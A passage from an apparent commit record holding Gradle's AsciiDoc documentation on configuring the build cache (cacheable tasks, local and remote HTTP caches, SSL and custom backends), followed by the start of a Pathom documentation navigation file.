\n\n==== Specifying access credentials\n\nhttps:\/\/en.wikipedia.org\/wiki\/Basic_access_authentication[HTTP Basic Authentication] is supported, with credentials being sent preemptively.\n\n.Specifying access credentials\n====\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/groovy\",files=\"settings.gradle[tags=configure-http-build-cache]\"]\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/kotlin\",files=\"settings.gradle.kts[tags=configure-http-build-cache]\"]\n====\n\n[[sec:build_cache_redirects]]\n==== Redirects\n\n`3xx` redirecting responses will be followed automatically.\n\nServers must take care when redirecting `PUT` requests as only `307` and `308` redirect responses will be followed with a `PUT` request.\nAll other redirect responses will be followed with a `GET` request, as per https:\/\/datatracker.ietf.org\/doc\/html\/rfc7231#page-54[RFC 7231],\nwithout the entry payload as the body.\n\n[[sec:build_cache_error_handling]]\n==== Network error handling\n\nRequests that fail during request transmission, after having established a TCP connection, will be retried automatically.\n\nThis prevents temporary problems, such as connection drops, read or write timeouts, and low level network failures such as connection resets, from causing cache operations to fail and disabling the remote cache for the remainder of the build.\n\nRequests will be retried up to 3 times.\nIf the problem persists, the cache operation will fail and the remote cache will be disabled for the remainder of the build.\n\n==== Using SSL\n\nBy default, use of HTTPS requires the server to present a certificate that is trusted by the build's Java runtime.\nIf your server's certificate is not trusted, you can:\n\n1. Update the trust store of your Java runtime to allow it to be trusted\n2. Change the <<build_environment.adoc#build_environment,build environment>> to use an alternative trust store for the build runtime\n3. Disable the requirement for a trusted certificate\n\nThe trust requirement can be disabled by setting link:{groovyDslPath}\/org.gradle.caching.http.HttpBuildCache.html#org.gradle.caching.http.HttpBuildCache:allowUntrustedServer[HttpBuildCache.isAllowUntrustedServer()] to `true`.\nEnabling this option is a security risk, as it allows any cache server to impersonate the intended server.\nIt should only be used as a temporary measure or in very tightly controlled network environments.\n\n.Allow untrusted cache server\n====\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/groovy\",files=\"settings.gradle[tags=allow-untrusted-server]\"]\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/kotlin\",files=\"settings.gradle.kts[tags=allow-untrusted-server]\"]\n====\n\n[[sec:build_cache_expect_continue]]\n==== HTTP expect-continue\n\nUse of https:\/\/www.w3.org\/Protocols\/rfc2616\/rfc2616-sec8.html#sec8.2.3[HTTP Expect-Continue] can be enabled.\nThis causes upload requests to happen in two parts: first a check whether a body would be accepted, then transmission of the body if the server indicates it will accept it.\n\nThis is useful when uploading to cache servers that routinely redirect or reject upload requests,\nas it avoids uploading the cache entry just to have it rejected (e.g. 
the cache entry is larger than the cache will allow) or redirected.\nThis additional check incurs extra latency when the server accepts the request, but reduces latency when the request is rejected or redirected.\n\nNot all HTTP servers and proxies reliably implement Expect-Continue.\nBe sure to check that your cache server does support it before enabling it.\n\nTo enable, set link:{groovyDslPath}\/org.gradle.caching.http.HttpBuildCache.html#org.gradle.caching.http.HttpBuildCache:useExpectContinue[HttpBuildCache.isUseExpectContinue()] to `true`.\n\n.Use Expect-Continue\n====\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/groovy\",files=\"settings.gradle[tags=use-expect-continue]\"]\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/kotlin\",files=\"settings.gradle.kts[tags=use-expect-continue]\"]\n====\n\n[[sec:build_cache_configure_use_cases]]\n=== Configuration use cases\n\nThe recommended use case for the remote build cache is that your continuous integration server populates it from clean builds while developers only load from it.\nThe configuration would then look as follows.\n\n.Recommended setup for CI push use case\n====\ninclude::sample[dir=\"snippets\/buildCache\/developer-ci-setup\/groovy\",files=\"settings.gradle[tags=developer-ci-setup]\"]\ninclude::sample[dir=\"snippets\/buildCache\/developer-ci-setup\/kotlin\",files=\"settings.gradle.kts[tags=developer-ci-setup]\"]\n====\n\nIt is also possible to configure the build cache from an <<init_scripts.adoc#sec:using_an_init_script,init script>>, which can be used from the command line, added to your Gradle user home or be a part of your custom Gradle distribution.\n\n.Init script to configure the build cache\n====\ninclude::sample[dir=\"snippets\/buildCache\/configure-by-init-script\/groovy\",files=\"init.gradle[]\"]\ninclude::sample[dir=\"snippets\/buildCache\/configure-by-init-script\/kotlin\",files=\"init.gradle.kts[]\"]\n====\n\n[[sec:build_cache_composite]]\n=== Build cache, composite builds and `buildSrc`\n\nGradle's <<composite_builds.adoc#composite_builds,composite build feature>> allows including other complete Gradle builds into another build.\nSuch included builds will inherit the build cache configuration from the top level build, regardless of whether the included builds define build cache configuration themselves or not.\n\nThe build cache configuration present for any included build is effectively ignored, in favour of the top level build's configuration.\nThis also applies to any `buildSrc` projects of any included builds.\n\nThe <<organizing_gradle_projects.adoc#sec:build_sources,`buildSrc` directory>> is treated as an <<composite_builds.adoc#composite_build_intro,included build>>, and as such it inherits the build cache configuration from the top-level build.\n\n[NOTE]\n====\nThis configuration precedence does not apply to <<composite_builds.adoc#included_plugin_builds,plugin builds>> included through `pluginManagement` as these are loaded _before_ the cache configuration itself.\n====\n\n[[sec:build_cache_setup_http_backend]]\n== How to set up an HTTP build cache backend\n\nGradle provides a Docker image for a link:https:\/\/hub.docker.com\/r\/gradle\/build-cache-node\/[build cache node], which can connect with Gradle Enterprise for centralized management.\nThe cache node can also be used without a Gradle Enterprise installation with restricted functionality.\n\n[[sec:build_cache_implement]]\n== Implement your own Build Cache\n\nUsing a different build cache backend to store build outputs (which is not covered by the built-in support for connecting to an HTTP backend) requires implementing\nyour own logic for connecting to your custom build cache backend.\nTo this end, custom build cache types can be registered via link:{javadocPath}\/org\/gradle\/caching\/configuration\/BuildCacheConfiguration.html#registerBuildCacheService-java.lang.Class-java.lang.Class-[BuildCacheConfiguration.registerBuildCacheService(java.lang.Class, java.lang.Class)].
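\n\nAs a rough sketch, registration could look like this in `settings.gradle`; the `Redis*` names are hypothetical, and the `RedisBuildCacheServiceFactory` (an implementation of `BuildCacheServiceFactory`) is left out:\n\n[source,groovy]\n----\n\/\/ Hypothetical custom cache type; the configuration object only carries settings.\nclass RedisBuildCache extends AbstractBuildCache {\n    String host = 'localhost'\n    int port = 6379\n}\n\nbuildCache {\n    \/\/ Tie the configuration type to the factory that creates the actual service.\n    registerBuildCacheService(RedisBuildCache, RedisBuildCacheServiceFactory)\n\n    remote(RedisBuildCache) {\n        host = 'cache.example.com'\n        push = true\n    }\n}\n----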
\n\nlink:https:\/\/gradle.com\/build-cache[Gradle Enterprise] includes a high-performance, easy to install and operate, shared build cache backend.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[build_cache]]\n= Build Cache\n\nTIP: Want to learn the tips and tricks top engineering teams use to keep builds fast and performant? https:\/\/gradle.com\/training\/#build-cache-deep-dive[Register here] for our Build Cache Training.\n\n[[sec:build_cache_intro]]\n== Overview\n\nThe Gradle _build cache_ is a cache mechanism that aims to save time by reusing outputs produced by other builds.\nThe build cache works by storing (locally or remotely) build outputs and allowing builds to fetch these outputs from the cache when it is determined that inputs have not changed, avoiding the expensive work of regenerating them.\n\nA first feature using the build cache is _task output caching_.\nEssentially, task output caching leverages the same intelligence as <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>> that Gradle uses to avoid work when a previous local build has already produced a set of task outputs.\nBut instead of being limited to the previous build in the same workspace, task output caching allows Gradle to reuse task outputs from any earlier build in any location on the local machine.\nWhen using a shared build cache for task output caching this even works across developer machines and build agents.\n\nApart from tasks, <<artifact_transforms.adoc#sec:abm_artifact_transforms,artifact transforms>> can also leverage the build cache and re-use their outputs similarly to task output caching.\n\nTIP: For a hands-on approach to learning how to use the build cache, start with reading through the <<build_cache_use_cases.adoc#use_cases_cache,use cases for the build cache>> and the follow up sections.\nIt covers the different scenarios that caching can improve and has detailed discussions of the different caveats you need to be aware of when enabling caching for a build.\n\n[[sec:build_cache_enable]]\n== Enable the Build Cache\n\nBy default, the build cache is not enabled. 
You can enable the build cache in a couple of ways:\n\nRun with `--build-cache` on the command-line::\nGradle will use the build cache for this build only.\nPut `org.gradle.caching=true` in your `gradle.properties`::\nGradle will try to reuse outputs from previous builds for all builds, unless explicitly disabled with `--no-build-cache`.\n\nWhen the build cache is enabled, it will store build outputs in the Gradle user home.\nFor configuring this directory or different kinds of build caches see <<#sec:build_cache_configure,Configure the Build Cache>>.\n\n[[sec:task_output_caching]]\n== Task Output Caching\n\nBeyond incremental builds described in <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>>, Gradle can save time by reusing outputs from previous executions of a task by matching inputs to the task.\nTask outputs can be reused between builds on one computer or even between builds running on different computers via a build cache.\n\nWe have focused on the use case where users have an organization-wide remote build cache that is populated regularly by continuous integration builds.\nDevelopers and other continuous integration agents should load cache entries from the remote build cache.\nWe expect that developers will not be allowed to populate the remote build cache, and all continuous integration builds populate the build cache after running the `clean` task.\n\nFor your build to play well with task output caching it must work well with the <<more_about_tasks.adoc#sec:up_to_date_checks,incremental build>> feature.\nFor example, when running your build twice in a row all tasks with outputs should be `UP-TO-DATE`.\nYou cannot expect faster builds or correct builds when enabling task output caching when this prerequisite is not met.\n\nTask output caching is automatically enabled when you enable the build cache, see <<#sec:build_cache_enable,Enable the Build Cache>>.\n\n[[sec:task_output_caching_example]]\n=== What does it look like\n\nLet us start with a project using the Java plugin which has a few Java source files. We run the build the first time.\n\n----\n> gradle --build-cache compileJava\n:compileJava\n:processResources\n:classes\n:jar\n:assemble\n\nBUILD SUCCESSFUL\n----\n\nWe see the directory used by the local build cache in the output. Apart from that the build was the same as without the build cache.\nLet's clean and run the build again.\n\n----\n> gradle clean\n:clean\n\nBUILD SUCCESSFUL\n----\n\n----\n> gradle --build-cache assemble\n:compileJava FROM-CACHE\n:processResources\n:classes\n:jar\n:assemble\n\nBUILD SUCCESSFUL\n----\n\nNow we see that, instead of executing the `:compileJava` task, the outputs of the task have been loaded from the build cache.\nThe other tasks have not been loaded from the build cache since they are not cacheable. This is due to\n`:classes` and `:assemble` being <<more_about_tasks.adoc#sec:lifecycle_tasks,lifecycle tasks>> and `:processResources`\nand `:jar` being Copy-like tasks which are not cacheable since it is generally faster to execute them.\n\n[[sec:task_output_caching_details]]\n== Cacheable tasks\n\nSince a task describes all of its inputs and outputs, Gradle can compute a _build cache key_ that uniquely defines the task's outputs based on its inputs.\nThat build cache key is used to request previous outputs from a build cache or store new outputs in the build cache.\nIf the previous build outputs have been already stored in the cache by someone else, e.g. 
your continuous integration server or other developers, you can avoid executing most tasks locally.\n\nThe following inputs contribute to the build cache key for a task in the same way that they do for <<more_about_tasks.adoc#sec:how_does_it_work,up-to-date checks>>:\n\n* The task type and its classpath\n* The names of the output properties\n* The names and values of properties annotated as described in <<more_about_tasks.adoc#sec:task_input_output_annotations,the section called \"Custom task types\">>\n* The names and values of properties added by the DSL via link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskInputs.html[TaskInputs]\n* The classpath of the Gradle distribution, buildSrc and plugins\n* The content of the build script when it affects execution of the task\n\nTask types need to opt-in to task output caching using the link:{javadocPath}\/org\/gradle\/api\/tasks\/CacheableTask.html[@CacheableTask] annotation.\nNote that link:{javadocPath}\/org\/gradle\/api\/tasks\/CacheableTask.html[@CacheableTask] is not inherited by subclasses.\nCustom task types are _not_ cacheable by default.\n\n[[sec:task_output_caching_cacheable_tasks]]\n=== Built-in cacheable tasks\n\nCurrently, the following built-in Gradle tasks are cacheable:\n\n* Java toolchain:\n link:{groovyDslPath}\/org.gradle.api.tasks.compile.JavaCompile.html[JavaCompile],\n link:{groovyDslPath}\/org.gradle.api.tasks.javadoc.Javadoc.html[Javadoc]\n* Groovy toolchain:\n link:{groovyDslPath}\/org.gradle.api.tasks.compile.GroovyCompile.html[GroovyCompile],\n link:{groovyDslPath}\/org.gradle.api.tasks.javadoc.Groovydoc.html[Groovydoc]\n* Scala toolchain:\n link:{groovyDslPath}\/org.gradle.api.tasks.scala.ScalaCompile.html[ScalaCompile],\n link:{javadocPath}\/org\/gradle\/language\/scala\/tasks\/PlatformScalaCompile.html[PlatformScalaCompile],\n link:{groovyDslPath}\/org.gradle.api.tasks.scala.ScalaDoc.html[ScalaDoc]\n* Native toolchain:\n link:{javadocPath}\/org\/gradle\/language\/cpp\/tasks\/CppCompile.html[CppCompile],\n link:{javadocPath}\/org\/gradle\/language\/c\/tasks\/CCompile.html[CCompile],\n link:{javadocPath}\/org\/gradle\/language\/swift\/tasks\/SwiftCompile.html[SwiftCompile]\n* Testing:\n link:{groovyDslPath}\/org.gradle.api.tasks.testing.Test.html[Test]\n* Code quality tasks:\n link:{groovyDslPath}\/org.gradle.api.plugins.quality.Checkstyle.html[Checkstyle],\n link:{groovyDslPath}\/org.gradle.api.plugins.quality.CodeNarc.html[CodeNarc],\n link:{groovyDslPath}\/org.gradle.api.plugins.quality.Pmd.html[Pmd]\n* JaCoCo:\n link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html[JacocoReport]\n* Other tasks:\n link:{groovyDslPath}\/org.gradle.api.plugins.antlr.AntlrTask.html[AntlrTask],\n link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html[ValidatePlugins],\n link:{groovyDslPath}\/org.gradle.api.tasks.WriteProperties.html[WriteProperties]\n\nAll other built-in tasks are currently not cacheable.\n\nSome tasks, like link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html[Copy] or link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar], usually do not make sense to make cacheable because Gradle is only copying files from one location to another.\nIt also doesn't make sense to make tasks cacheable that do not produce outputs or have no task actions.\n\n[[sec:task_output_caching_cacheable_3rd_party]]\n=== Third party plugins\n\nThere are third party plugins that work well with the build cache.\nThe most prominent examples are the 
https:\/\/developer.android.com\/studio\/releases\/gradle-plugin.html[Android plugin 3.1+] and the https:\/\/blog.gradle.org\/kotlin-build-cache-use[Kotlin plugin 1.2.21+].\nFor other third party plugins, check their documentation to find out whether they support the build cache.\n\n[[sec:task_output_caching_inputs]]\n=== Declaring task inputs and outputs\n\nIt is very important that a cacheable task has a complete picture of its inputs and outputs, so that the results from one build can be safely re-used somewhere else.\n\nMissing task inputs can cause incorrect cache hits, where different results are treated as identical because the same cache key is used by both executions.\nMissing task outputs can cause build failures if Gradle does not completely capture all outputs for a given task.\nWrongly declared task inputs can lead to cache misses especially when containing volatile data or absolute paths.\n(See <<more_about_tasks.adoc#sec:task_inputs_outputs,the section called \"Task inputs and outputs\">> on what should be declared as inputs and outputs.)\n\n[NOTE]\n====\nThe task path is _not_ an input to the build cache key.\nThis means that tasks with different task paths can re-use each other's outputs as long as Gradle determines that executing them yields the same result.\n====\n\nIn order to ensure that the inputs and outputs are properly declared use integration tests (for example using TestKit) to check that a task produces the same outputs for identical inputs and captures all output files for the task.\nWe suggest adding tests to ensure that the task inputs are relocatable, i.e. that the task can be loaded from the cache into a different build directory (see link:{javadocPath}\/org\/gradle\/api\/tasks\/PathSensitive.html[@PathSensitive]).\n\nIn order to handle volatile inputs for your tasks consider <<more_about_tasks.adoc#sec:configure_input_normalization,configuring input normalization>>.\n\n[[sec:task_output_caching_disabled_by_default]]\n=== Marking tasks as non-cacheable by default\n\nThere are certain tasks that don't benefit from using the build cache.\nOne example is a task that only moves data around the file system, like a `Copy` task.\nYou can signify that a task is not to be cached by adding the `@DisableCachingByDefault` annotation to it.\nYou can also give a human-readable reason for not caching the task by default.\nThe annotation can be used on its own, or together with `@CacheableTask`.\n\n[NOTE]\n====\nThis annotation is only for documenting the reason behind not caching the task by default.\nBuild logic can override this decision via the runtime API (see below).\n====\n\n== Enable caching of non-cacheable tasks\n\nAs we have seen, built-in tasks, or tasks provided by plugins, are cacheable if their class is annotated with the `Cacheable` annotation.\nBut what if you want to make cacheable a task whose class is not cacheable?\nLet's take a concrete example: your build script uses a generic `NpmTask` task to create a JavaScript bundle by delegating to NPM (and running `npm run bundle`).\nThis process is similar to a complex compilation task, but `NpmTask` is too generic to be cacheable by default: it just takes arguments and runs npm with those arguments.\n\nThe inputs and outputs of this task are simple to figure out.\nThe inputs are the directory containing the JavaScript files, and the NPM configuration files.\nThe output is the bundle file generated by this task.\n\n=== Using annotations\n\nWe create a subclass of the `NpmTask` and use 
<<more_about_tasks.adoc#sec:task_input_output_annotations,annotations to declare the inputs and outputs>>.\n\nWhen possible, it is better to use delegation instead of creating a subclass.\nThat is the case for the built in `JavaExec`, `Exec`, `Copy` and `Sync` tasks, which have a method on `Project` to do the actual work.\n\nIf you're a modern JavaScript developer, you know that bundling can be quite long, and is worth caching.\nTo achieve that, we need to tell Gradle that it's allowed to cache the output of that task, using the link:{javadocPath}\/org\/gradle\/api\/tasks\/CacheableTask.html[@CacheableTask] annotation.\n\nThis is sufficient to make the task cacheable on your own machine.\nHowever, input files are identified by default by their absolute path.\nSo if the cache needs to be shared between several developers or machines using different paths, that won't work as expected.\nSo we also need to set the <<build_cache_concepts.adoc#relocatability,path sensitivity>>.\nIn this case, the relative path of the input files can be used to identify them.\n\nNote that it is possible to override property annotations from the base class by overriding the getter of the base class and annotating that method.\n\n.Custom cacheable BundleTask\n====\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle-task\/groovy\",files=\"build.gradle[tags=bundle-task]\"]\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle-task\/kotlin\",files=\"build.gradle.kts[tags=bundle-task]\"]\n====\n- (1) Add `@CacheableTask` to enable caching for the task.\n- (2) Override the getter of a property of the base class to change the input annotation to `@Internal`.\n- (3) (4) Declare the path sensitivity.\n\n=== Using the runtime API\n\nIf for some reason you cannot create a new custom task class, it is also possible to make a task cacheable using the <<more_about_tasks.adoc#sec:task_input_output_runtime_api,runtime API>> to declare the inputs and outputs.\n\nFor enabling caching for the task you need to use the link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#cacheIf-org.gradle.api.specs.Spec-[TaskOutputs.cacheIf()] method.\n\nThe declarations via the runtime API have the same effect as the annotations described above.\nNote that you cannot override file inputs and outputs via the runtime API.\nInput properties can be overridden by specifying the same property name.\n\n.Make the bundle task cacheable\n====\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle\/groovy\",files=\"build.gradle[tags=bundle-task]\"]\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle\/kotlin\",files=\"build.gradle.kts[tags=bundle-task]\"]\n====\n\n[[sec:build_cache_configure]]\n== Configure the Build Cache\n\nYou can configure the build cache by using the link:{groovyDslPath}\/org.gradle.api.initialization.Settings.html#org.gradle.api.initialization.Settings:buildCache(org.gradle.api.Action)[Settings.buildCache(org.gradle.api.Action)] block in `settings.gradle`.\n\nGradle supports a `local` and a `remote` build cache that can be configured separately.\nWhen both build caches are enabled, Gradle tries to load build outputs from the local build cache first, and then tries the remote build cache if no build outputs are found.\nIf outputs are found in the remote cache, they are also stored in the local cache, so next time they will be found locally.\nGradle stores (\"pushes\") build outputs in any build cache that is enabled and has 
link:{javadocPath}\/org\/gradle\/caching\/configuration\/BuildCache.html#isPush--[BuildCache.isPush()] set to `true`.\n\nBy default, the local build cache has push enabled, and the remote build cache has push disabled.\n\nThe local build cache is pre-configured to be a link:{groovyDslPath}\/org.gradle.caching.local.DirectoryBuildCache.html[DirectoryBuildCache] and enabled by default.\nThe remote build cache can be configured by specifying the type of build cache to connect to (link:{groovyDslPath}\/org.gradle.caching.configuration.BuildCacheConfiguration.html#org.gradle.caching.configuration.BuildCacheConfiguration:remote(java.lang.Class)[BuildCacheConfiguration.remote(java.lang.Class)]).\n\n[[sec:build_cache_configure_local]]\n=== Built-in local build cache\n\nThe built-in local build cache, link:{groovyDslPath}\/org.gradle.caching.local.DirectoryBuildCache.html[DirectoryBuildCache], uses a directory to store build cache artifacts.\nBy default, this directory resides in the Gradle user home directory, but its location is configurable.\n\nGradle will periodically clean up the local cache directory by removing entries that have not been used recently to conserve disk space.\nHow often Gradle will perform this clean-up is configurable as shown in the example below.\nNote that cache entries are cleaned up regardless of the project they were produced by.\nTherefore it is recommended to configure this setting globally in the <<init_scripts.adoc#sec:using_an_init_script,init script>>.\nThe <<sec:build_cache_configure_use_cases, Configuration use-cases>> section has an example of putting cache configuration in the init script.\n\nFor more details on the configuration options, refer to the DSL documentation of link:{groovyDslPath}\/org.gradle.caching.local.DirectoryBuildCache.html[DirectoryBuildCache].\nHere is an example of the configuration.\n\n.Configure the local cache\n====\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/groovy\",files=\"settings.gradle[tags=configure-directory-build-cache]\"]\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/kotlin\",files=\"settings.gradle.kts[tags=configure-directory-build-cache]\"]\n====\n\n[[sec:build_cache_configure_remote]]\n=== Remote HTTP build cache\n\nlink:{groovyDslPath}\/org.gradle.caching.http.HttpBuildCache.html[HttpBuildCache] provides the ability to read from and write to a remote cache via HTTP.\n\nWith the following configuration, the local build cache will be used for storing build outputs while the local and the remote build cache will be used for retrieving build outputs.\n\n.Load from HttpBuildCache\n====\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/groovy\",files=\"settings.gradle[tags=http-build-cache]\"]\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/kotlin\",files=\"settings.gradle.kts[tags=http-build-cache]\"]\n====\n\nWhen attempting to load an entry, a `GET` request is made to `\\https:\/\/example.com:8123\/cache\/«cache-key»`.\nThe response must have a `2xx` status and the cache entry as the body, or a `404 Not Found` status if the entry does not exist.\n\nWhen attempting to store an entry, a `PUT` request is made to `\\https:\/\/example.com:8123\/cache\/«cache-key»`.\nAny `2xx` response status is interpreted as success.\nA `413 Payload Too Large` response may be returned to indicate that the payload is larger than the server will accept, which will not be treated as an error.\n\n==== Specifying access 
credentials\n\nhttps:\/\/en.wikipedia.org\/wiki\/Basic_access_authentication[HTTP Basic Authentication] is supported, with credentials being sent preemptively.\n\n.Specifying access credentials\n====\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/groovy\",files=\"settings.gradle[tags=configure-http-build-cache]\"]\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/kotlin\",files=\"settings.gradle.kts[tags=configure-http-build-cache]\"]\n====\n\n[[sec:build_cache_redirects]]\n==== Redirects\n\n`3xx` redirecting responses will be followed automatically.\n\nServers must take care when redirecting `PUT` requests as only `307` and `308` redirect responses will be followed with a `PUT` request.\nAll other redirect responses will be followed with a `GET` request, as per https:\/\/datatracker.ietf.org\/doc\/html\/rfc7231#page-54[RFC 7231],\nwithout the entry payload as the body.\n\n[[sec:build_cache_error_handling]]\n==== Network error handling\n\nRequests that fail during request transmission, after having established a TCP connection, will be retried automatically.\n\nThis prevents temporary problems, such as connection drops, read or write timeouts, and low level network failures such as a connection resets, causing cache operations to fail and disabling the remote cache for the remainder of the build.\n\nRequests will be retried up to 3 times.\nIf the problem persists, the cache operation will fail and the remote cache will be disabled for the remainder of the build.\n\n==== Using SSL\n\nBy default, use of HTTPS requires the server to present a certificate that is trusted by the build's Java runtime.\nIf your server's certificate is not trusted, you can:\n\n1. Update the trust store of your Java runtime to allow it to be trusted\n2. Change the <<build_environment.adoc#build_environment,build environment>> to use an alternative trust store for the build runtime\n3. Disable the requirement for a trusted certificate\n\nThe trust requirement can be disabled by setting link:{groovyDslPath}\/org.gradle.caching.http.HttpBuildCache.html#org.gradle.caching.http.HttpBuildCache:allowUntrustedServer[HttpBuildCache.isAllowUntrustedServer()] to `true`.\nEnabling this option is a security risk, as it allows any cache server to impersonate the intended server.\nIt should only be used as a temporary measure or in very tightly controlled network environments.\n\n.Allow untrusted cache server\n====\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/groovy\",files=\"settings.gradle[tags=allow-untrusted-server]\"]\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/kotlin\",files=\"settings.gradle.kts[tags=allow-untrusted-server]\"]\n====\n\n[[sec:build_cache_expect_continue]]\n==== HTTP expect-continue\n\nUse of https:\/\/www.w3.org\/Protocols\/rfc2616\/rfc2616-sec8.html#sec8.2.3[HTTP Expect-Continue] can be enabled.\nThis causes upload requests to happen in two parts: first a check whether a body would be accepted, then transmission of the body if the server indicates it will accept it.\n\nThis is useful when uploading to cache servers that routinely redirect or reject upload requests,\nas it avoids uploading the cache entry just to have it rejected (e.g. 
the cache entry is larger than the cache will allow) or redirected.\nThis additional check incurs extra latency when the server accepts the request, but reduces latency when the request is rejected or redirected.\n\nNot all HTTP servers and proxies reliably implement Expect-Continue.\nBe sure to check that your cache server does support it before enabling.\n\nTo enable, set link:{groovyDslPath}\/org.gradle.caching.http.HttpBuildCache.html#org.gradle.caching.http.HttpBuildCache:useExpectContinue[HttpBuildCache.isUseExpectContinue()] to `true`.\n\n.Use Expect-Continue\n====\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/groovy\",files=\"settings.gradle[tags=use-expect-continue]\"]\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/kotlin\",files=\"settings.gradle.kts[tags=use-expect-continue]\"]\n====\n\n[[sec:build_cache_configure_use_cases]]\n=== Configuration use cases\n\nThe recommended use case for the remote build cache is that your continuous integration server populates it from clean builds while developers only load from it.\nThe configuration would then look as follows.\n\n.Recommended setup for CI push use case\n====\ninclude::sample[dir=\"snippets\/buildCache\/developer-ci-setup\/groovy\",files=\"settings.gradle[tags=developer-ci-setup]\"]\ninclude::sample[dir=\"snippets\/buildCache\/developer-ci-setup\/kotlin\",files=\"settings.gradle.kts[tags=developer-ci-setup]\"]\n====\n\nIt is also possible to configure the build cache from an <<init_scripts.adoc#sec:using_an_init_script,init script>>, which can be used from the command line, added to your Gradle user home or be a part of your custom Gradle distribution.\n\n.Init script to configure the build cache\n====\ninclude::sample[dir=\"snippets\/buildCache\/configure-by-init-script\/groovy\",files=\"init.gradle[]\"]\ninclude::sample[dir=\"snippets\/buildCache\/configure-by-init-script\/kotlin\",files=\"init.gradle.kts[]\"]\n====\n\n[[sec:build_cache_composite]]\n=== Build cache, composite builds and `buildSrc`\n\nGradle's <<composite_builds.adoc#composite_builds,composite build feature>> allows including other complete Gradle builds into another.\nSuch included builds will inherit the build cache configuration from the top level build, regardless of whether the included builds define build cache configuration themselves or not.\n\nThe build cache configuration present for any included build is effectively ignored, in favour of the top level build's configuration.\nThis also applies to any `buildSrc` projects of any included builds.\n\nThe <<organizing_gradle_projects.adoc#sec:build_sources,`buildSrc` directory>> is treated as an <<composite_builds.adoc#composite_build_intro,included build>>, and as such it inherits the build cache configuration from the top-level build.\n\n[NOTE]\n====\nThis configuration precedence does not apply to <<composite_builds.adoc#included_plugin_builds,plugin builds>> included through `pluginManagement` as these are loaded _before_ the cache configuration itself.\n====\n\n[[sec:build_cache_setup_http_backend]]\n== How to set up an HTTP build cache backend\n\nGradle provides a Docker image for a link:https:\/\/hub.docker.com\/r\/gradle\/build-cache-node\/[build cache node], which can connect with Gradle Enterprise for centralized management.\nThe cache node can also be used without a Gradle Enterprise installation with restricted functionality.\n\n[[sec:build_cache_implement]]\n== Implement your own Build Cache\n\nUsing a different build cache backend to store build outputs 
(which is not covered by the built-in support for connecting to an HTTP backend) requires implementing\nyour own logic for connecting to your custom build cache backend.\nTo this end, custom build cache types can be registered via link:{javadocPath}\/org\/gradle\/caching\/configuration\/BuildCacheConfiguration.html#registerBuildCacheService-java.lang.Class-java.lang.Class-[BuildCacheConfiguration.registerBuildCacheService(java.lang.Class, java.lang.Class)].\n\nlink:https:\/\/gradle.com\/build-cache[Gradle Enterprise] includes a high-performance, easy to install and operate, shared build cache backend.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aed2893d12e4f347d02fd794638bcadabfc42767","subject":"No Pathom titles","message":"No Pathom titles\n","repos":"wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom","old_file":"docs-src\/modules\/ROOT\/nav.adoc","new_file":"docs-src\/modules\/ROOT\/nav.adoc","new_contents":"* xref:introduction.adoc[Introduction]\n* xref:upgrade-guide.adoc[Upgrade Guide]\n* xref:connect.adoc[Connect]\n** xref:connect\/basics.adoc[The Basics]\n** xref:connect\/resolvers.adoc[Resolvers]\n** xref:connect\/connect-mutations.adoc[Connect Mutations]\n** xref:connect\/shared-resolvers.adoc[Shared Resolvers]\n** xref:connect\/thread-pool.adoc[Using Thread Pool]\n** xref:connect\/readers.adoc[Connect Readers]\n** xref:connect\/indexes.adoc[Understanding the Indexes]\n** xref:connect\/exploration.adoc[Exploration with Pathom Viz]\n* xref:plugins.adoc[Plugins]\n* xref:core.adoc[Core Engine]\n** xref:core\/getting-started.adoc[Getting Started]\n** xref:core\/parsers.adoc[Parsers]\n** xref:core\/readers.adoc[Readers]\n** xref:core\/entities.adoc[Entity]\n** xref:core\/error-handling.adoc[Error handling]\n** xref:core\/dispatch-helpers.adoc[Dispatch helpers]\n** xref:core\/mutations.adoc[Mutations]\n** xref:core\/request-cache.adoc[Request Caching]\n** xref:core\/placeholders.adoc[Placeholders]\n** xref:core\/trace.adoc[Tracing]\n** xref:core\/path-track.adoc[Path tracking]\n** xref:core\/async.adoc[Async parser]\n* xref:cljs-specs.adoc[Remove specs on Clojurescript]\n* xref:other-helpers.adoc[Other 